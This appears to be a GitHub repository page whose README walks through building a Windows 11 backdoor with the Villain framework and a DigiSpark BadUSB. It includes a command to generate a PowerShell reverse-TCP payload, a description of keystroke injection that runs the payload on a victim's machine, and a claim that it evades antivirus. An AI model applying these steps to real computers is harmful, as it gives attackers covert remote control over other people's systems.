https://github.com/mishqatabid/network-security
Creating Backdoor using Villain & Penetrating into Windows 11
https://github.com/mishqatabid/network-security
arduino backdoor digispark-scripts pentesting villian windows-11 windows-exploitation
Last synced: about 1 month ago
JSON representation
Creating Backdoor using Villain & Penetrating into Windows 11
- Host: GitHub
- URL: https://github.com/mishqatabid/network-security
- Owner: mishqatabid
- Created: 2023-12-23T08:03:25.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2024-07-22T18:57:52.000Z (almost 2 years ago)
- Last Synced: 2025-05-15T20:49:55.746Z (about 1 year ago)
- Topics: arduino, backdoor, digispark-scripts, pentesting, villian, windows-11, windows-exploitation
- Language: C++
- Homepage:
- Size: 31.3 KB
- Stars: 1
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Network-Security
# Requirements:
• Kali Linux (attacker’s machine)
• Windows 11 (victim’s machine)
• Villain Tool on Kali Linux
• DigiSpark Attiny85
• Arduino IDE
# Installing Villain Tool
Install the latest version of Villain manually:
```console
sudo git clone https://github.com/t3l3machus/Villain.git
```
Install the `requirements.txt`
```console
cd ./Villain
pip3 install -r requirements.txt
```
You should also install `gnome-terminal` (required for one of the framework's commands):
```console
sudo apt update&&sudo apt install gnome-terminal
```
Now it is ready to use
# Generate & Test Payload
## Generating Payload
As Villain tool is operating, we will use it to generate to generate the required payload for our backdoor.
To generate the payload, write the keyword generate, specify the type of payload you want to generate, then specify the local host and click enter to get the desired payload
```
generate payload=windows/netcat/powershell_reverse_tcp lhost=eth0
```
## Testing Payload
• The payload is generated and it’s time to test the payload.
• For testing we are using Windows 11
• Open the PowerShell, paste the payload on shell and click enter
• You can witness that the payload is running successfully and have bypassed the Windows Antivurus and Firewall
# Deploying Payload
• To deploy the payload, we will download the [Arduino IDE](https://www.arduino.cc/en/software)
• Open the IDE, create a new sketch file and write down the code for Digispark Attiny85.
• The [Sketch](https://github.com/mishqatabid/Network-Security/blob/main/sketch.ino) is then compiled and uploaded on Arduino present in Digispark Attiny85
# Backdoor
• Now when the victim inject the Attiny85 in its machine.
• After few seconds, search bar is opens and PowerShell is searched
• It opens the PowerShell, then automatically pastes the payload and click enter to execute it.
• Once the script is executed you can witness that a backdoor session has been established on the Villain terminal on attacker’s machine.
• Now by typing sessions on the Villain terminal, you can see all the possible session that has been established using the payload.
• It contains Session ID, IP Address, OS Type, User, Owner and Status.
Now the backdoor has been created, you can easily execute any command
# Use this for Education Purpose ONLY